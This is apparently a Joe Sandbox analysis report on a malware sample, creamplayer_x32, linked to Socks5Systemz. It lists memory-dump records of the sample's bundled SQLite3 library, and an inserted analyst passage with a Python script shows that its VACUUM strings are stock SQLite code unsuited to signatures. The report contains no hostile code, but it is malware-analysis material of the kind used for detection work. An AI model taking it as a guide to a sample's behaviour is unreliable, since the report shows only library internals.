                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                    • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                                                    • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                                    • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                    • Instruction ID: a276b763828cd9d21177d39229c24ef0f5c00ef14d0f26540801fec71d9d5410
                                                                                                    • Opcode Fuzzy Hash: c82c79c3d673ce5d83164ffe7b594e49b00bd73c00824d0aa5044480003c1f0d
                                                                                                    • Instruction Fuzzy Hash: 29E0E2B850430DABDF00CF09D8C198A7BAAFB08264F10C119FC190B304C331E9148BE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                    • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                                    • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                                    • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                                    • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                                    • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                                    • API String ID: 1320758876-2501389569
                                                                                                    • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                    • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                                    • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                                    • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926526
                                                                                                    • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926550
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926626
                                                                                                    • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926638
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                                    • sqlite3_free.SQLITE3 ref: 60926673
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                                    • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                    • API String ID: 937752868-2111127023
                                                                                                    • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                    • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                    • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                    • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                                    • String ID: @$access$cache
                                                                                                    • API String ID: 4158134138-1361544076
                                                                                                    • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                    • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                                    • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                                    • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                    • BEGIN;, xrefs: 609485DB
                                                                                                    • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                    • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                    • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                    • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                    • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                    • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                    • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                    • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                    • API String ID: 632333372-52344843
                                                                                                    • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                    • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                    • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                    • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
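The eleven statements listed for this routine are the copy-based VACUUM that SQLite itself ships (vacuum.c): attach a scratch database, recreate every table and index there from the schema text in sqlite_master, bulk-copy the rows, then carry over sqlite_sequence and the view/trigger rows. For the analyst the point is that these strings are stock library code inside the bundled SQLITE3 module, so a signature written on them would match any application that embeds SQLite rather than the Socks5Systemz payload. The script below is an added example, not code from the report or from the sample: it runs the dump's own generator statements, in xref order, against a constructed in-memory database so the effect of each can be checked. The last step of the routine (INSERT INTO vacuum_db.sqlite_master for views and triggers) is left out because from the SQL API it needs PRAGMA writable_schema; the library toggles that permission internally for this routine, which is inferred from SQLite's source, not from this report. The sample table, index names and rows are constructed for the demonstration.

```python
import sqlite3

# Constructed sample database (not taken from the report): a table with an
# AUTOINCREMENT key, a plain index and a unique index, with one row deleted
# so there is something for a vacuum to reclaim.
def build_sample_db() -> sqlite3.Connection:
    # isolation_level=None: no implicit BEGIN, so the dump's own BEGIN/COMMIT
    # and the ATTACH (which must run outside a transaction) behave as in SQLite.
    con = sqlite3.connect(":memory:", isolation_level=None)
    con.executescript("""
        CREATE TABLE hosts(id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, port INTEGER);
        CREATE INDEX hosts_port ON hosts(port);
        CREATE UNIQUE INDEX hosts_name ON hosts(name);
        INSERT INTO hosts(name, port) VALUES ('a', 1080), ('b', 8080), ('c', 1080);
        DELETE FROM hosts WHERE name = 'b';
    """)
    return con

# Generator statements exactly as they appear in the dump, in xref order
# (609486C8, 609486E8, 60948708, 60948728, 60948748, 60948768). Each SELECT
# yields the DDL/DML that the routine then executes against vacuum_db.
VACUUM_GENERATORS = [
    "SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0",
    "SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' ",
    "SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'",
    "SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0",
    "SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' ",
    "SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';",
]

def copy_vacuum(con: sqlite3.Connection) -> dict:
    """Rebuild main into an attached scratch database the way the dumped
    routine does, then report what landed in vacuum_db."""
    con.execute("ATTACH ':memory:' AS vacuum_db;")      # xref 60948534
    con.execute("PRAGMA vacuum_db.synchronous=OFF")     # xref 609485BB
    con.execute("BEGIN;")                               # xref 609485DB
    for generator in VACUUM_GENERATORS:
        # Materialise the generated statements before running them so the
        # schema writes do not disturb the cursor reading sqlite_master.
        for (stmt,) in con.execute(generator).fetchall():
            con.execute(stmt)
    con.execute("COMMIT;")
    objects = con.execute(
        "SELECT type, name FROM vacuum_db.sqlite_master ORDER BY name").fetchall()
    rows = con.execute(
        "SELECT name, port FROM vacuum_db.hosts ORDER BY name").fetchall()
    seq = con.execute(
        "SELECT seq FROM vacuum_db.sqlite_sequence WHERE name='hosts'").fetchone()[0]
    return {"objects": objects, "rows": rows, "hosts_seq": seq}

if __name__ == "__main__":
    print(copy_vacuum(build_sample_db()))
```

The substr offsets in the generators (14 and 21) are what make this stock code: they skip the fixed "CREATE TABLE ", "CREATE INDEX " and "CREATE UNIQUE INDEX " prefixes that SQLite normalises when it stores schema text, so the same statement text can be replayed under the vacuum_db schema qualifier. The single-quoted names produced by quote() are accepted as identifiers because a string literal is not valid in that position, which is the same lenience the library's own routine depends on.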
                                                                                                    APIs
                                                                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                      • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                    • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                    • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                    • String ID: offsets
                                                                                                    • API String ID: 463808202-2642679573
                                                                                                    • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                    • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                                    • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                                    • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2903785150-0
                                                                                                    • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                    • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                                    • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                                    • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 423083942-0
                                                                                                    • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                    • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                                    • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                    • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                    • String ID:
                                                                                                    • API String ID: 3556715608-0
                                                                                                    • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                    • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                    • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                    • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
